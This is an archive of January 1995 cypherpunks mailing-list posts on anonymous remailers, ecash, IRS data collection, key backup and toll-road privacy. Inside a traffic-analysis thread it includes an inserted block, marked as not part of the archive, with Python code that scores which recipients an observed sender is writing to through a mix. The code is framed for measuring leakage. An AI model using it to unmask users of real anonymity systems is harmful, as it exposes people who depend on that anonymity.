Content-Type: text


	I finally got annoyed with Tim clamoring for a Remailer in a Box,
so I set it up just now... I just wrote it so there may be some problems
I haven't gotten rid of yet.

	If you want to run a remailer on c2.org:

1) Sign up for a shell account on http://www.c2.org/services/signup.html

2) Log into your account (via dialup [510-549-1383] or telnet [c2.org])
once it has been created.  (within a day.. I'll automate account creation
so it gets made within an hour soon, but right now I am doing it manually.)

3) If you wish, you can set up a .forward file to point to mailfilters
or to another account. 

4) Run the program /usr/local/lib/boxed-remailer/install_remail. The
remailer will be installed, and non-remailed mail will be acted upon
according to how the account was set up before you ran the program.

5) Answer the questions, they should be pretty simple.

	Once an account is created there is a one week free grace period.
If you'd like to continue the account you can pay for it.

	If you have problems and suggestions, make sure you mail me, and
I'll fix it. This is still in beta testing, so if you have problems I won't
disable the account waiting for payment until the problems are fixed.

$10 for one month, $27 for 3 months, $45 for 6 months.
--
sameer                                          Voice:   510-841-2014
Network Administrator                           Pager:   510-321-1014
Community ConneXion: The NEXUS-Berkeley         Dialin:  510-549-1383
http://www.c2.org (or login as "guest")                 sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Fri, 20 Jan 95 15:20:42 PST
To: cypherpunks@toad.com
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501202311.AB09922@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 PM 1/20/95 CST, xpat@vm1.spcs.umn.edu wrote:
>Excerpts from : St Paul Pioneer Press, Jan 29, 1995
>
>"IRS plans to collect more data on individuals to nab tax cheats"

        [...]

Here's the text from the recent EPIC announcement on this--it covers the
exemption the IRS is claiming from the FOIA in a bit more detail (sorry if 
people have already seen this):

=======================================================================
[6] IRS Initiates Massive New Database
=======================================================================

On December 20, the Internal Revenue Service announced in the Federal
Register that it was planning a new database to monitor compliance of
taxpayers in a project entitled Compliance 2000.  The database would
contain information on all individuals in the U.S. who conduct certain
financial transactions and would be segmented by different criteria:

	Any individual who has business and/or financial
	activities. These may be grouped by industry, occupation,
	or financial transactions, included in commercial
	databases, or in information provided by state and local
	licensing agencies.

The new database will combine private and public sector databases in a
single searchable entity.  A number of federal financial databases
from the IRS will be enhanced with state, local and commercial
sources. The Federal Register notice describes the non-tax databases:

	Examples of other information would include data
	from commercial databases, any state's Department
	of Motor Vehicles (DMV), credit bureaus, state and
	local real estate records, commercial publications,
	newspapers, airplane and pilot information, U.S.
	Coast Guard vessel registration information, any
	state's Department of Natural Resources
	information, as well as other state and local
	records.  In addition, Federal government databases
	may also be accessed, such as, federal employment
	files, federal licensing data, etc.

Finally, even though the proposed system would use frequently
inaccurate "commercial databases" such as direct marketing records,
taxpayers would not be able to review their records to ensure that
they are accurate and up to date:  "This system is exempt from the
access and contest provisions of the Privacy Act."

EPIC is filing comments asking the IRS to reconsider its use of
commercial databases and to ensure that there are greater safeguards
on the collection and use of personal information.

A copy of the Federal Register notice is available at cpsr.org
/cpsr/privacy/epic/IRS_compliance_2000_notice_txt
Comments on the proposed system must be received by January 19, 1995,
and sent to Office of Disclosure, Internal Revenue Service, 1111 Conn.
Ave, NW, Washington, DC 20224. EPIC's Comments are available at
cpsr.org /cpsr/privacy/epic/epic_irs_compliance_2000_comments.txt

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 20 Jan 95 18:23:18 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <ab46056806021004ab8a@[132.162.201.201]>
Message-ID: <Pine.3.89.9501201850.A29683-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



 At 6:54 PM 01/20/95, anonymous-remailer@shell.portal.com wrote:
> >  But electronic computers are good at checking out these kinds of
> >chains automatically.  Suppose there were a web of debt-trust.  Each
> >person would indicate the other people whose IOUs they will accept
> >(and the amount they would be willing to take).  Thus I might take (up
> >to $10 of) Jo's, who might take Carol's who might take Terry's, etc.

On Fri, 20 Jan 1995, Jonathan Rochkind wrote:
> Certainly, that's what money is after all. Pretty much.  But how are you
> going to transfer these IOUs electronically in a way that is relatively
> fraud-proof? 

I believe that the point that anonymous was making is that if
everyone is their own bank and their own currency issuer,
then identity based cash is just as resistant to state power,
and perhaps more resistant, than anonymous cash.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Fri, 20 Jan 95 22:29:05 PST
To: cypherpunks@toad.com
Subject: Re: Key backup
In-Reply-To: <199501182358.SAA29305@bb.hks.net>
Message-ID: <2778lyczB0I7075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501182358.SAA29305@bb.hks.net>, you wrote:

> Variations on this theme (there are many) are encouraged. Have a friend
> check out a library book and let you stamp your key somewhere inside. It's
> the number of possible variations that make this seemingly impossible to
> attack. Apologies if this "secret ink" stuff is way off base  ;-) .
> 
> Most people (myself included) would opt for the "split and
> disguise" or "hidden/buried" key schemes where secret ink wouldn't add
> much security.

> 'Adam Shostack' was reported to have written:

> > If you want to hide bits, they
> > should be stripped of low entropy parts and hidden with a stego
> > program.
> 
> The idea was to use something other than magnetic media. A new and
> different optical encoding method could be devised to hide a key in a 
> halftone, but the barcode example was offered as one possibility using
> an existing standard. The basis for this thread was the perceived need
> for a relatively simple key backup system that didn't require the active
> participation of a whole horde of people.

Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having
crucial data encoded into graphical images and tattooed onto the skins
of beach bums.  

I've heard of worse ideas. . . .

                          | PROOF-READER, n: A malefactor who atones for
   Alan Bostick           | making your writing nonsense by permitting
   abostick@netcom.com    | the compositor to make it unintelligible.
finger for PGP public key |      Ambrose Bierce, THE DEVIL'S DICTIONARY
Key fingerprint:          | 
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79  +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBLyBy+eVevBgtmhnpAQF2ogMAh5Br252k6h29mcNepsDfo0htW32AmcfX
6YpJZycKs95V3foxd5pdjtuPqdkEeI03n966g3TXRbgNSe3dX7je1h8b6wsDH9hF
CWsabq/Z5KgiRUIGHDrcEtKpsl0+Xf2y
=txNr
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 19:07:08 PST
To: greg@ideath.goldenbear.com (Greg Broiles)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com>
Message-ID: <199501210301.TAA09022@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:

> Tim May wrote:
> 
> > I am waiting for such services to be actually, formally, solidly
> > announced, not just casual remarks that it might be possible. And of
> > course the software should be "ready to wear," port-a-potty, so that
> > the remailer account owner does nothing more than pay for the account.
> 
> In this model, who deals with mailbombs/spams/requests for address blocks?
> It is this sort of administrivia (plus the threat of liability) that
> makes running a remailer troublesome, not a lack of someone's $20/month.

In this model the owner of the machine (who is not himself a remailer,
only a seller of accounts) simply ignores all such issues of
mailbombs, spams, request for address blocks. He has a form letter
that says something like:

"I am not the initiator of any mail bombs, spams, or illegal mail. I
merely sell accounts, like private mail boxes. Some of the mail you
are objecting to may have originated on my system, some may merely
have passed through my system, just as mail passes through many
systems from sender to receiver. If you have problems, talk to the
sender, not to me. Under the ECPA I cannot even _look_ at the mail on
my system, and even if it were legal, I would not."


> I think it's disingenuous to say that "X pays the bills for the network
> link; X purchased the hardware and keeps it running; the box is in X's
> house/office; X is the person who reads complaint mail and responds (or
> fails to); but because Y sends X $20/month, the remailer (and attendant
> liability for its mis/use) belongs to Y." I realize that there's a 
> certain formal logic to it, but I don't think that anyone - not courts,
> and not the world-in-general - is going to pay attention to that 
> formalism when it's clear that a machine essentially under the control
> of X is being used for 'antisocial' means.

It likely buys a couple of years of protection, though. Currently the
remailer sites = remailer accounts, so they have little or no
protection.

I don't think "disingenuous" is a very apt description. For one thing,
my proposal certainly doesn't make things any _worse_ for the true
remailers. 

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 19:09:29 PST
To: perry@imsi.com
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501201859.AA06028@snark.imsi.com>
Message-ID: <199501210308.TAA09743@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> xpat@vm1.spcs.umn.edu says:
> > Excerpts from : St Paul Pioneer Press, Jan 29, 1995
> > 
> > Here's the kicker: "Although agency officials concede that some of
> > the data collected will be inaccurate, taxpayers will not be allowed
> > to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
> > ^^^^^^^^^^^^^^^^^^^^^^^
> > So much for the FOIA.
> 
> The privacy act and FOIA make that more or less illegal -- if they are
> keeping information on you, with certain law enforcement related
> exceptions they have to let you see it.

The articles I've read on this new system ("Compliance 2000") make it
clear that the IRS will be buying data from non-governmental entities,
e.g., the direct marketing databases and the commercial credit
reporting agencies. This neatly skirts the FOIA, as the FOIA cannot be
used to force a private entity or corporation to reveal its own data
(which, as a libertarian, I am glad of....I wouldn't want folks
demanding to sift through my records, files, and dossiers).

This just extends the type of "subcontracting" to nominally private
entities that the intelligence community began many years ago. The
corporation, "Dossiers R Us," will be the "Air America" for our age.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Fri, 20 Jan 95 19:23:27 PST
To: greg@ideath.goldenbear.com>
Subject: RE: Remailers-in-a-box
Message-ID: <Chameleon.4.01.950120192306.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>I guess it'd be possible to treat remailers as disposable - when one
>had pissed off enough people, it could be abandoned - but this lack
>of long-term reliability seems poor.

Someone had posted a protocol scheme that would allow new remailers to
advertise their existence on a newsgroup, which would cause any number
of auto pinging "reputation" services to begin monitoring this new
remailer automatically.  Once reliability, etc., was established, the
reputation services would "add" this node to the remailernet.  Similar
actions would take place if a remailer just "went away".

Quality of service, features, etc., would be part of the advertisement,
and would result in a form of competition between remailers.  Similarly,
reputation services would have differing criteria for "blessing" a site,
which would result in a form of competition between the _reputation servers_
for a good reputation.

The key to this whole scheme is in the automation of the process.  Done
correctly, it would result in a self-organizing, self-healing ecology of
remailers, that would naturally gravitate toward providing the features
and services in most demand.

Yeah, sure.  Looks good on paper, anyway.  Lots of real-life hassles to 
work out, but it _probably_ could be made to work.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Fri, 20 Jan 95 19:22:33 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: traffic analyzing Chaum's digital mix
In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950120191922.22820B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 20 Jan 1995, Hal wrote:
 
> Another interesting aspect of your analysis is the possible role of
> latency.  Earlier I had thought of latency as primarily a way of doing
> mixing, an alternative or addition to batching which mixes messages
> without holding them up quite as much.  But in terms of this in/out
> analysis latency could play a part in blurring the batch boundaries,
> adding more uncertainty and making the job of the analyst harder so he
> would need more data to establish his scores.

Latency (by which I take to mean some kind of random delay) will 
probably make the analyst's job harder, but I suspect not by much.  The 
method of analysis I outlined earlier can be modified to apply to mixes 
that use random delay instead of batching as the method of mixing.  
Instead of adding up the number of times Alice's message to the mix is 
followed up by a message from the mix to a user, take the sum of the 
probabilities that each message the user receives is from Alice.

So you would do something like this for each user of the mix:
    message #    probability this message came from Alice
        1                  0.000135
        2                  0
        3                  0.000012
        4                  0.004332

                 SUM:      0.004479

Each probability can be calculated from the statistical distribution of 
the delay time, the length of time between Alice sending the last 
message to the mix and the user receiving a message from the mix, and 
the timing and number of other messages sent by the mix around this 
period of time.

This method is more general than the one I talked about earlier, since 
it is equivalent to the former method when you apply it to a batching 
mix (that is, the original Chaumian mix).

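
[Added example, not part of Wei Dai's message or of the list archive: a Python sketch of the sum-of-probabilities score described above, of the kind a mix operator could use to judge how much a delay policy leaks. It assumes an exponential delay, scores each delivery independently (ignoring that one input yields exactly one output), uses constructed timestamps and hypothetical function names, and includes the batching case to show the reduction to per-batch counting.]

```python
import math
from collections import defaultdict


def exp_delay_density(mean_delay):
    """Likelihood that a message sent at `sent` leaves the mix at `received`
    when the mix holds each message for an exponentially distributed time
    (the exponential distribution is an assumption of this example)."""
    def density(sent, received):
        delay = received - sent
        if delay < 0:
            return 0.0  # a message cannot leave before it arrives
        return math.exp(-delay / mean_delay) / mean_delay
    return density


def batch_density(flush_times):
    """Same interface for a batching mix: an input can only leave in the
    first flush at or after its arrival, and is equally likely to be any
    message of that flush."""
    flushes = sorted(flush_times)
    def density(sent, received):
        for flush in flushes:
            if flush >= sent:
                return 1.0 if flush == received else 0.0
        return 0.0
    return density


def sender_scores(inputs, outputs, density, target="alice"):
    """inputs:  (time, sender) pairs observed entering the mix.
    outputs: (time, recipient) pairs observed leaving the mix.
    Returns {recipient: sum over that recipient's messages of the
    probability that the message came from `target`}."""
    scores = defaultdict(float)
    for t_out, recipient in outputs:
        weights = [(sender, density(t_in, t_out)) for t_in, sender in inputs]
        total = sum(w for _, w in weights)
        from_target = sum(w for sender, w in weights if sender == target)
        scores[recipient] += from_target / total if total > 0 else 0.0
    return dict(scores)


# Constructed observations (seconds). Alice's messages actually go to bob.
DELAY_INPUTS = [
    (0, "alice"), (2, "carol"), (40, "dave"),
    (60, "carol"), (98, "dave"), (100, "alice"),
    (150, "carol"), (200, "alice"), (260, "dave"),
]
DELAY_OUTPUTS = [
    (6, "bob"), (15, "eve"), (47, "frank"),
    (66, "eve"), (103, "frank"), (108, "bob"),
    (158, "eve"), (204, "bob"), (275, "frank"),
]

# Constructed batching mix: two messages per batch, flushed at 10, 20, 30.
BATCH_FLUSHES = [10, 20, 30]
BATCH_INPUTS = [
    (1, "alice"), (2, "carol"),
    (11, "alice"), (12, "dave"),
    (21, "carol"), (22, "dave"),
]
BATCH_OUTPUTS = [
    (10, "bob"), (10, "eve"),
    (20, "bob"), (20, "frank"),
    (30, "eve"), (30, "frank"),
]


def delay_mix_scores(mean_delay=10.0):
    """Scores for the random-delay mix over the constructed trace."""
    return sender_scores(DELAY_INPUTS, DELAY_OUTPUTS,
                         exp_delay_density(mean_delay))


def batch_mix_scores():
    """Scores for the batching mix; each equals (batches shared with
    Alice) / (batch size), i.e. the earlier counting method rescaled."""
    return sender_scores(BATCH_INPUTS, BATCH_OUTPUTS,
                         batch_density(BATCH_FLUSHES))


if __name__ == "__main__":
    for name, result in (("delay", delay_mix_scores()),
                         ("batch", batch_mix_scores())):
        ranked = sorted(result.items(), key=lambda kv: -kv[1])
        print(name, [(user, round(score, 3)) for user, score in ranked])
```

[With an exponential delay the ratio between two candidate senders depends only on the gap between their send times, so cover traffic entering close to Alice's messages lowers her score for every recipient, while traffic far from them barely matters.]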





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 20 Jan 95 16:32:04 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney?  Why not a web of debt?
Message-ID: <ab46056806021004ab8a@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:54 PM 01/20/95, anonymous-remailer@shell.portal.com wrote:
>  But electronic computers are good at checking out these kinds of
>chains automatically.  Suppose there were a web of debt-trust.  Each
>person would indicate the other people whose IOUs they will accept
>(and the amount they would be willing to take).  Thus I might take (up
>to $10 of) Jo's, who might take Carol's who might take Terry's, etc.
>
>  To buy something from me online, you will need to produce an IOU
>from Jo, Carol or Terry.  I would hand it to Jo for verification.  Jo
>would accept it or reject it (perhaps after talking to some other
>folks online).  If it were a CarolIOU, or a TerryIOU I would insist Jo
>trade it for a JoIOU.  All the details could be hidden behind a nice
>little GUI.

Certainly, that's what money is after all. Pretty much.  But how are you
going to transfer these IOUs electronically in a way that is relatively
fraud-proof?  Digital money.  Ecash.  When we say "ecash", we're talking
about what Chaum was writing about in whatever paper, what Schneier
describes protocols for in AC.
Maybe the ecash is redeemable in US dollars, or maybe it's redeemable for
10 units of service from Jon Smith, but an ecash protocol is what you are
going to use to transfer and issue those digital certificates of value,
whatever the value represents.

And of course, if you want to use these certificates of value anonymously,
which is what is required to pay for an anon remailer, there are some
slightly more stringent requirements. The right kind of ecash protocol can
still handle it.  But Carol probably shouldn't be paying for a remailer in
CarolBucks (or CarolIOUs, whatever), at least not unless Carol is such a
big spender that CarolBucks are in wide circulation and used by lots of
people other than Carol.  Which I guess is possible in your system.

A pseudo-anarchist non-state-supported debt system would work fine, but you
still need a mechanism to transfer your certificates of value, whether they
stand for ten U.S. dollars, or 10 hours that Jon Smith will work mowing
your lawn.  And another way to look at it is that you are just proposing an
ecash system where every person issues their own ecash, instead of just a
few central banks doing it.  There are advantages and disadvantages to that
sort of thing, and it might be something interesting to think about, but
you ultimately aren't going to be able to do it over a computer network
without ecash.  Ecash is the way you represent value certificates in
digital form, pretty much.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 20 Jan 95 16:57:45 PST
To: cypherpunks@toad.com
Subject: Purshottam
Message-ID: <199501210057.TAA29696@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>----- Forwarded message (Andrew Purshottam <andy@eon.netcom.com>) -----< 
 
 
Dear Mr. Purshottam, 
 
Mail to <andy@eon.netcom.com> boings. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 20 Jan 95 23:44:39 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Remailers-in-a-box
In-Reply-To: <199501210301.TAA09022@netcom14.netcom.com>
Message-ID: <199501210401.AA02848@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> I don't think "disingenuous" is a very apt description. For one thing,
> my proposal certainly doesn't make things any _worse_ for the true
> remailers. 

Sorry if I was unclear; I didn't mean that you were being disingenuous,
just that the assignment of responsibility/culpability in at least 
some of the schemes being discussed looks suspect to me.

I do think that this plan can create greater risk for the owners of
machines which operate remailers - what if one of their customers 
decides not to block traffic to whitehouse.gov, or to
alt.religion.copyright, or whatever? Neither the SPA nor the Secret
Service has acted particularly cluefully with respect to seizing
hardware or conducting unannounced destructive "fishing" expeditions.
As things stand today, I have some control (via my filter list) of
the risks I'm willing to assume and not assume. If I let people with
no real stake in the matter gamble with my machine based on their own
choices about filtering, that looks like a loss to me.

(Of course, the machine owner can always, via contract, set certain
terms - e.g., addresses which must be filtered. This starts to look
like active participation in the administration of the remailer, which
makes the off-site operator structure seem less legitimate.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 21:18:50 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: The Remailer Crisis
In-Reply-To: <v01510100ab4639b0ffe3@[152.97.12.101]>
Message-ID: <199501210517.VAA16355@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rhys Kyraden wrote:

> Okay. Here's my 2-bits.
> I run on the MacOS, but how hard could it be to port this code? If anyone
> is willing to do this (I assume it's not written in Pascal, which is my
> only language of any consequence), I will run it. It will be available from
> now until I graduate in '98 during the school months. If anyone wants to
> try this from scratch, we could try it in Pascal. I would be very willing
> to do the developing as well as host a discussion list for anyone who jumps
> in.

But is your Mac on the Internet on a more or less continuous basis? A
remailer that only works when the owner happens to log on to collect
his mail is not terribly useful (though not useless, as others have
also noted....just a "very unpredictable lag time" remailer, sort of
the "surface mail" of e-mail).

It happens that the Net is mainly built up of Unix boxes, hence the
focus here on Unix. OS/2, Windows, and Mac boxes will be used
increasingly for constant connection applications, so the idea has
merit, long term.

(Another nit: the Mac, which is what I also use, currently lacks
preemptive multitasking. Thus, if one's Mac is playing a multimedia
CD-ROM when new mail comes in, it likely won't get remailed until the
first app quits or is manually switched out. (Yeah, a few things like
print drivers can run in background, and maybe the new TIA emulators
can trick the OS into processing SLIP or PPP mail in the background,
but who knows?) The consensus is that the Mac is powerful, but it
ain't cut out yet to be a Unix box.)

The language is a lesser deal. Remember that Eric Hughes knocked out
the first remailer in Perl in a few days, and MacPerl exists for the
Mac. Going to Pascal would probably be more trouble than it's worth.

But the most important feature to have is a solid, reliable connection
to the Net. A computer that gets taken to classes, is not connected to
the Net, etc., is not very useful as a remailer.

(The key is not that a remailer can sometimes remail, but that it can
be counted on to be part of chain without the mail getting "dropped on
the floor.")

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 21:38:37 PST
To: dan@chopin.udel.edu (The Dalai Lama)
Subject: Re: The Remailer Crisis
In-Reply-To: <Pine.SOL.3.91.950120221331.8346B-100000@chopin.udel.edu>
Message-ID: <199501210537.VAA19112@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Dalai Lama wrote:

(By the way, Hello, Dalai!)

> So why not just implement remailers for the DOS/OS/2/Windows NT crowd?  
> I think we'd see more remailers if people didn't need to leave their OS 
> of choice just to run UNIX and a remailer.  OS/2 and Windows NT are 
> stable platforms.  If there was little performance impact caused by an 
> OS/2 remailer process, I'd be more than willing to let it run.
> 	Is anyone working on porting remailer code to one of the 
> IBM/Microsoft operating systems?  Perhaps I'll get cracking on an OS/2 
> version....

I addressed this main issue in the posting about writing remailers for
Macs, so I'll be ultra-brief here.

Had DOS/Windows/OS/2 boxes been "on the Net" in a serious way when
Eric wrote the first remailer in 1992, he could have written the
remailer for the DOS box he then owned.

The issue has been that Unix boxes have dominated the Net, with lots
of tools for handling mail, redirecting output, etc. DOS tends to have
standalone apps, with cumbersome communication, and DOS has not had
preemptive multitasking as Unix of course has had.

"The network is the computer," as Scott McNealy used to say, and a
reliable and continuous Net connection is much more important for a
remailer than a fast CPU or GUI environment.

This will change, based on the numbers of Windows and OS/2 systems
being sold, and based on moves to build in Net connection
capabilities.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: northrop@netcom.com (Scott Northrop)
Date: Fri, 20 Jan 95 21:39:08 PST
To: cypherpunks@toad.com
Subject: "Smart Roads" for toll collection and traffic logging
Message-ID: <199501210538.VAA13452@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Here in Seattle there is a proposal to turn a couple of traffic chokepoints
into toll roads.  Because a toll plaza would back things up even worse, I'm
guessing they'll look to an automated system that will let you pay without
leaving your car.  This is established tech -- a nifty article about it showed
up in _Electronic Design_ last month.

The downside is that it'll not be designed with privacy in mind at all, and
will eventually have this pesky database of who went by the toll booth and
when.  We all know that old databases never die, they just get put on tape and
stuffed in a box, to wait for someone with a curious streak to come by.  This
is a well-established problem with naive designs of automated toll plazas,
and I am looking for examples of things that could be done with this database
by someone with ill intent, or could be done with the toll system itself if it
got to be more widespread.

- Obviously, if your car is talking to the road all the time, speeding tickets
are a gimme.

- You might be targeted for "further investigation" if you happen to drive by
the wrong part of town.  Gotta step up the heat on that war on drugs, ya know.

I can come up with all sorts of ways to detect people from committing crimes
(and don't really need those examples -- folks might think I *want* a Big
Brother Highway!), but I'm curious what people's fears are about what this
could mean to innocent folks, Joe Sixpack and his pals.  There is a meeting in
a few days where public comment on the toll road idea is being solicited, and
I want to have some really compelling horror stories with which to capture
people's imaginations about what a Big Brother Highway could mean.

I want to scare people, but I want to scare 'em with something believable.

If there's an archive that mentions anything like this, please point it out in
private mail.  I'll summarize what I get to the list, and also make that
document available on the web, if anything interesting comes up.

Thanks!

Scott


-- 
Scott Northrop  (206)559-9878   northrop@netcom.com, northrop@mccaw.com
      Those who use arms well cultivate the Way and keep the rules.
      Thus they can govern in such a way as to prevail over the corrupt.
                                     -- Sun Tzu, The Art of War, Book IV



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 20 Jan 95 18:59:12 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501202311.AB09922@eri.erinet.com>
Message-ID: <9501210257.AA29480@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Fri, 20 Jan 95 18:11:54 EST
    From: "Paul J. Ste. Marie" <pstemari@erinet.com>
    
    At 12:44 PM 1/20/95 CST, xpat@vm1.spcs.umn.edu wrote:
    >Excerpts from : St Paul Pioneer Press, Jan 29, 1995
    >

    . . .

    Comments on the proposed system must be received by January 19, 1995,

Ok, let me get this straight.  In nine days there will be an article
which will mention that yesterday was the last day to comment on this.
Cool!  :-)

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Fri, 20 Jan 95 22:09:15 PST
To: cypherpunks@toad.com
Subject: cpla mailing list revived
Message-ID: <9501202206.aa14003@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


The quietness of the cpla list was brought to my attention recently.
I have improved the list software, changed the list address into a
real internet style mailing list.  You should now be able to join
and depart the cpla mailing list automatically.  Who knows, this might
even prompt a physical get-together.

I will be adding the members of the old list to the new list, so
expect to get another copy of the welcome message if you were on the
cpla list a while ago.

Here is a copy of the welcome message, FYI.

Welcome to the Cypherpunks LA <cpla@markv.com> mailing list.

Like every moderator of every new list, I hope this will be mostly
signal and very little noise.  I don't envision this as a general
discussion list -- that's what the main list is for.

This list is for:

	Coordinating physical meetings of Cypherpunks in the Los
	Angeles area: Location, time, equipment, arranging rides,
	etc.

	Suggesting topics to cover at the meetings.

	Coordinating other local group activities.

	Announcements of relevant talks, seminars and other such
	goodies in the Los Angeles area and environs.

	*Concise* pointers to other local groups, mailing lists, and
	sources of information that might be of interest to local
	Cypherpunks.

	Whatever everyone seems to use it for.

This list is NOT for:

	Reposting the "important" messages from the main list or any
	other mailing list or newsgroup.  (If someone wants to run a
	"distilled" Cypherpunks list, fine.  This isn't it!)

	Preaching to the converted.  No ranting!  (If you want to
	rant, do it on the main list.  Everyone else seems to...)

	Rehashing the same topics that are going on the main list.

This list is now managed by a simple minded program.  Send a message
with a blank body and the subject 'subscribe' to be added to the
list.  The subject 'unsubscribe' will remove you from the list.

Any suggestions for how to improve this intro are welcome.  Any
suggestions for a *local* FAQ are also welcome.  Direct your
suggestions to me at jpp@markv.com.  PGP/ViaCrypt mail gladly
accepted.

This information is also available at
ftp://ftp.markv.com/pub/jpp/cp-la-hi.txt

j' <jpp@markv.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 22:12:38 PST
To: northrop@netcom.com (Scott Northrop)
Subject: Re: "Smart Roads" for toll collection and traffic logging
In-Reply-To: <199501210538.VAA13452@netcom5.netcom.com>
